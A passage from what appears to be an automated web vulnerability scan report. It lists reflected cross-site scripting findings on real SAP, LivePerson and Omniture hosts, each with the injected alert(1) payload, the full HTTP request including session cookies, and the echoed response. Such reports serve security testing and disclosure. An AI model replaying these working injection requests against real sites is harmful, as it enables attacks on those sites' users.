"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='37021986-VID'; lpMTagConfig.FPC_VID='5110247826455'; lpMTagConfig.FPC_SKEY_NAME='37021986-SKEY'; lpMTagConfig.FPC_SKEY='37230221800283374401af53<img src=a onerror=alert(1)>2257775d063';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_37021986'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

3.43. https://sales.liveperson.net/hc/37021986/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 1cc9d<img%20src%3da%20onerror%3dalert(1)>4e366a67b73 was submitted in the msessionkey parameter. This input was echoed as 1cc9d<img src=a onerror=alert(1)>4e366a67b73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/37021986/?&visitor=5140389589811&msessionkey=13161083115174854891cc9d<img%20src%3da%20onerror%3dalert(1)>4e366a67b73&siteContainer=STANDALONE&site=37021986&cmd=mTagKnockPage&lpCallId=460133773312-512542360818&protV=20&lpjson=1&id=4477800663&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C%23voice-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpVoiceButtonDiv1%7C HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
Connection: Keep-Alive
Cookie: HumanClickKEY=1316108311517485489; HumanClickSiteContainerID_37021986=STANDALONE; ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL; LivePersonID=LP i=5140389589811,d=1318691628

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=13161083115174854891cc9d<img src=a onerror=alert(1)>4e366a67b73; path=/hc/37021986
Set-Cookie: HumanClickKEY=13161083115174854891cc9d<img src=a onerror=alert(1)>4e366a67b73; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 15:29:07 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Content-Length: 33255

lpConnLib.Process({"ResultSet": {"lpCallId":"460133773312-512542360818","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='37021986-VID'; lpMTagConfig.FPC_VID='5140389589811'; lpMTagConfig.FPC_SKEY_NAME='37021986-SKEY'; lpMTagConfig.FPC_SKEY='13161083115174854891cc9d<img src=a onerror=alert(1)>4e366a67b73';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_37021986'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

3.44. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sapglobalmarketingin.tt.omtrdc.net
Path:   /m2/sapglobalmarketingin/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 4d316<img%20src%3da%20onerror%3dalert(1)>4a39ca00ecc was submitted in the mbox parameter. This input was echoed as 4d316<img src=a onerror=alert(1)>4a39ca00ecc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/sapglobalmarketingin/sc/standard?mboxHost=store.businessobjects.com&mboxSession=1318689062767-959486&mboxPage=1318689062767-959486&mboxCount=1&mbox=SiteCatalyst%3A%20event4d316<img%20src%3da%20onerror%3dalert(1)>4a39ca00ecc&mboxId=0&mboxTime=1318671062929&visitorID=50271dcd9baa4ef3893c9fb47c6b6fd7&visitorNamespace=sap&pageName=estores%3Aus%3Ahomepage&currencyCode=USD&channel=estores&server=estores&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1326&browserHeight=890&dynamicAccountSelection=true&dynamicAccountList=sapvbudev%3Ddigitalriver.com&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=true&linkDownloadFileTypes=rar%2Cexe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=streamwork.com%2Csapstreamwork.com%2Caboutsapcampbell.com%2Canalytics-usa.com%2Cestara.com%2Cbestsapchina.com%2Cbusinessobjects.com%2Cbusinessobjects.com.pl%2Cbusiness-objects.com.pl%2Cbusinessobjects.pl%2Cbusiness-objects.pl%2Ccareersatsap.com%2Ccfolder.de%2Ccfolders.com%2Ccfolders.de%2Ccfolders.net%2Ccrystalreports.com%2Cdigitalriver.com%2Cedusap.at%2Cfazi.at%2Cfazi.com%2Cfazi.de%2Cfuturefactoryinitiative.com%2Cfuturefactoryinitiative.org%2Cfuzzy.at%2Cfuzzy.ch%2Cfuzzy-informatik.com%2Cfuzzy-informatik.de%2Cfuzzy-online.com%2Cfuzzy-online.de%2Cinfommersion.com%2Condemand.com%2Csap.at%2Csap.bg%2Csap.biz%2Csap.ca%2Csap.ch%2Csap.cl%2Csap.cn%2Csap.co.at%2Csap.co.il%2Csap.co.jp%2Csap.co.kr%2Csap.co.nz%2Csap.co.th%2Csap.co.uk%2Csap.co.za%2Csap.com%2Csap.com.au%2Csap.com.cn%2Csap.com.pl%2Csap.com.sg%2Csap.com.tr%2Csap.com.tw%2Csap.cz%2Csap.de%2Csap.ee%2Csap.fi%2Csap.hk%2Csap.hr%2Csap.hu%2Csap.ie%2Csap.in%2Csap.info%2Csap.kz%2Csap.lu%2Csap.nl%2Csap.pl%2Csap.pt%2Csap.ro%2Csap.ru%2Csap.si%2Csap.sk%2Csap.tw%2Csap.ua%2Csap.us%2Csapag.de%2Csap-ag.de%2Csapamerica.com%2Csap-answer.com%2Csap-austria.com%2Csap-best-fit-adviser.com%2Csapbusinessbydesign.cn%2Csapbusinessbydesign.co.uk%2Csapbusinessbydesign.com%2Csapbusinessbydesign.de%2Csapbusinessbydesign.us%2Csapbusinessobjects.com.pl%2Csap-business-objects.com.pl%2Csapbusinessobjects.pl%2Csap-business-objects.pl%2Csapbusinessobjectsresponses.com%2Csapbusinessone.pl%2Csap-campbell.com%2Csapcampbell.net%2Csapcampbell.org%2Csapchina.com%2Csapclear.com%2Csapconfigurator.com%2Csapdesignguild.org%2Csap-event.jp%2Csapevents.com%2Csap-forum.de%2Csap-insights.com%2Csapkhimetrics.com%2Csaplabs.bg%2Csaplabs.co.in%2Csaplabs.fr%2Csaplabs.in%2Csapnetweaver.com%2Csapphirenow.com%2Csap-retail.de%2Csapsapphire.com%2Csapsem.com%2Csap-spectrum.com%2Csapstreamwork.com%2Csapteched.com%2Csapthai.com%2Csapturkiye.com.tr%2Csap-tv.com%2Csapventures.com%2Csapworldtour.com%2Csapworldtour2010.com%2Csteeb.de%2Csap.corp%2Csaplabs.com%2Csybase.com%2Csappartneredge.eu%2Cjavascript%3A%2Cstore.businessobjects.com&linkTrackVars=visitorID%2Cserver&linkTrackEvents=None&prop1=na&eVar1=estores%3Aus&hier1=estores%2Cna%2Cus&prop2=english&eVar2=english&eVar3=estores&prop5=us&prop8=new&eVar8=new&prop9=logN&eVar9=logN&eVar13=CG4DA4BC51&prop14=logN%7Cestores%3Aus%3Ahomepage&prop15=null%7Cestores%3Aus%3Ahomepage&eVar15=%7C&eVar18=%2B1&eVar19=estores%2Cna%2Cus&eVar20=estores%3Aus%3Ahomepage&eVar35=http%3A%2F%2Fwww.sap.com%2Findex.epx&eVar36=CG4DA4BC51&prop38=saturday%7C4%3A30pm&eVar38=saturday%7C4%3A30pm&prop47=1&prop50=estores%3A2011.04.18%7Cgl%3A2011.09.07&mboxURL=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.%2B77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: sapglobalmarketingin.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 264
Date: Sat, 15 Oct 2011 14:33:01 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318689062767-959486.19");mboxFactories.get('default').get('SiteCatalyst: event4d316<img src=a onerror=alert(1)>4a39ca00ecc', 0).setOffer(new mboxOfferDefault()).loaded();}

3.45. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sapglobalmarketingin.tt.omtrdc.net
Path:   /m2/sapglobalmarketingin/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 785ad<script>alert(1)</script>e8955e63c5c was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sapglobalmarketingin/sc/standard?mboxHost=store.businessobjects.com&mboxSession=1318689062767-959486&mboxPage=1318689062767-959486&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=0785ad<script>alert(1)</script>e8955e63c5c&mboxTime=1318671062929&visitorID=50271dcd9baa4ef3893c9fb47c6b6fd7&visitorNamespace=sap&pageName=estores%3Aus%3Ahomepage&currencyCode=USD&channel=estores&server=estores&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1326&browserHeight=890&dynamicAccountSelection=true&dynamicAccountList=sapvbudev%3Ddigitalriver.com&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=true&linkDownloadFileTypes=rar%2Cexe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=streamwork.com%2Csapstreamwork.com%2Caboutsapcampbell.com%2Canalytics-usa.com%2Cestara.com%2Cbestsapchina.com%2Cbusinessobjects.com%2Cbusinessobjects.com.pl%2Cbusiness-objects.com.pl%2Cbusinessobjects.pl%2Cbusiness-objects.pl%2Ccareersatsap.com%2Ccfolder.de%2Ccfolders.com%2Ccfolders.de%2Ccfolders.net%2Ccrystalreports.com%2Cdigitalriver.com%2Cedusap.at%2Cfazi.at%2Cfazi.com%2Cfazi.de%2Cfuturefactoryinitiative.com%2Cfuturefactoryinitiative.org%2Cfuzzy.at%2Cfuzzy.ch%2Cfuzzy-informatik.com%2Cfuzzy-informatik.de%2Cfuzzy-online.com%2Cfuzzy-online.de%2Cinfommersion.com%2Condemand.com%2Csap.at%2Csap.bg%2Csap.biz%2Csap.ca%2Csap.ch%2Csap.cl%2Csap.cn%2Csap.co.at%2Csap.co.il%2Csap.co.jp%2Csap.co.kr%2Csap.co.nz%2Csap.co.th%2Csap.co.uk%2Csap.co.za%2Csap.com%2Csap.com.au%2Csap.com.cn%2Csap.com.pl%2Csap.com.sg%2Csap.com.tr%2Csap.com.tw%2Csap.cz%2Csap.de%2Csap.ee%2Csap.fi%2Csap.hk%2Csap.hr%2Csap.hu%2Csap.ie%2Csap.in%2Csap.info%2Csap.kz%2Csap.lu%2Csap.nl%2Csap.pl%2Csap.pt%2Csap.ro%2Csap.ru%2Csap.si%2Csap.sk%2Csap.tw%2Csap.ua%2Csap.us%2Csapag.de%2Csap-ag.de%2Csapamerica.com%2Csap-answer.com%2Csap-austria.com%2Csap-best-fit-adviser.com%2Csapbusinessbydesign.cn%2Csapbusinessbydesign.co.uk%2Csapbusinessbydesign.com%2Csapbusinessbydesign.de%2Csapbusinessbydesign.us%2Csapbusinessobjects.com.pl%2Csap-business-objects.com.pl%2Csapbusinessobjects.pl%2Csap-business-objects.pl%2Csapbusinessobjectsresponses.com%2Csapbusinessone.pl%2Csap-campbell.com%2Csapcampbell.net%2Csapcampbell.org%2Csapchina.com%2Csapclear.com%2Csapconfigurator.com%2Csapdesignguild.org%2Csap-event.jp%2Csapevents.com%2Csap-forum.de%2Csap-insights.com%2Csapkhimetrics.com%2Csaplabs.bg%2Csaplabs.co.in%2Csaplabs.fr%2Csaplabs.in%2Csapnetweaver.com%2Csapphirenow.com%2Csap-retail.de%2Csapsapphire.com%2Csapsem.com%2Csap-spectrum.com%2Csapstreamwork.com%2Csapteched.com%2Csapthai.com%2Csapturkiye.com.tr%2Csap-tv.com%2Csapventures.com%2Csapworldtour.com%2Csapworldtour2010.com%2Csteeb.de%2Csap.corp%2Csaplabs.com%2Csybase.com%2Csappartneredge.eu%2Cjavascript%3A%2Cstore.businessobjects.com&linkTrackVars=visitorID%2Cserver&linkTrackEvents=None&prop1=na&eVar1=estores%3Aus&hier1=estores%2Cna%2Cus&prop2=english&eVar2=english&eVar3=estores&prop5=us&prop8=new&eVar8=new&prop9=logN&eVar9=logN&eVar13=CG4DA4BC51&prop14=logN%7Cestores%3Aus%3Ahomepage&prop15=null%7Cestores%3Aus%3Ahomepage&eVar15=%7C&eVar18=%2B1&eVar19=estores%2Cna%2Cus&eVar20=estores%3Aus%3Ahomepage&eVar35=http%3A%2F%2Fwww.sap.com%2Findex.epx&eVar36=CG4DA4BC51&prop38=saturday%7C4%3A30pm&eVar38=saturday%7C4%3A30pm&prop47=1&prop50=estores%3A2011.04.18%7Cgl%3A2011.09.07&mboxURL=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.%2B77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: sapglobalmarketingin.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 261
Date: Sat, 15 Oct 2011 14:33:03 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318689062767-959486.19");mboxFactories.get('default').get('SiteCatalyst: event', 0785ad<script>alert(1)</script>e8955e63c5c).setOffer(new mboxOfferDefault()).loaded();}

3.46. http://smepartnerfinder.sap.com/FlashIFrame.aspx [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smepartnerfinder.sap.com
Path:   /FlashIFrame.aspx

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6586a"%3balert(1)//f4427f5b16c was submitted in the lang parameter. This input was echoed as 6586a";alert(1)//f4427f5b16c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FlashIFrame.aspx?lang=en6586a"%3balert(1)//f4427f5b16c HTTP/1.1
Host: smepartnerfinder.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://smepartnerfinder.sap.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; ASP.NET_SessionId=3mmip455whoq0f55gcf2phvg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:27:57 GMT
Content-Length: 2364


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
   <head><title>

</tit
...[SNIP]...
<script type="text/javascript">
               var flashvars = {};
               flashvars.lang = "en6586a";alert(1)//f4427f5b16c";
               flashvars.preview = "false";
               flashvars.Partner = "";
flashvars.externalId = "";

               var params = {};
               params.wmode = "transparent";
               params.allowfullscreen =
...[SNIP]...

3.47. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The value of the 39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf request parameter is copied into the HTML document as plain text between tags. The payload bd785<script>alert(1)</script>1c5f68d385a was submitted in the 39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg?39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf=1bd785<script>alert(1)</script>1c5f68d385a HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg?39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:16 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1323

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
</script>322e7d1fcaf=1bd785<script>alert(1)</script>1c5f68d385a" />
...[SNIP]...

3.48. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66fe1"><script>alert(1)</script>8b27daf9eeb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg66fe1"><script>alert(1)</script>8b27daf9eeb HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:45 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1279

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/cs_msg66fe1"><script>alert(1)</script>8b27daf9eeb" />
...[SNIP]...

3.49. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39359"><script>alert(1)</script>322e7d1fcaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg?39359"><script>alert(1)</script>322e7d1fcaf=1 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:43 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1282

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/cs_msg?39359"><script>alert(1)</script>322e7d1fcaf=1" />
...[SNIP]...

3.50. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19070"><script>alert(1)</script>c23af16cf20 was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/26917&page=19070"><script>alert(1)</script>c23af16cf20 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:50 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1315

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/26917&page=19070"><script>alert(1)</script>c23af16cf20" />
...[SNIP]...

3.51. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [x-lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The value of the x-lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80cf2"><script>alert(1)</script>80a4f10b6b was submitted in the x-lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg?x-lr=cs_disc/80cf2"><script>alert(1)</script>80a4f10b6b&x-lr2=wlg/26917&page= HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:48 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1314

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/cs_msg?x-lr=cs_disc/80cf2"><script>alert(1)</script>80a4f10b6b&x-lr2=wlg/26917&page=" />
...[SNIP]...

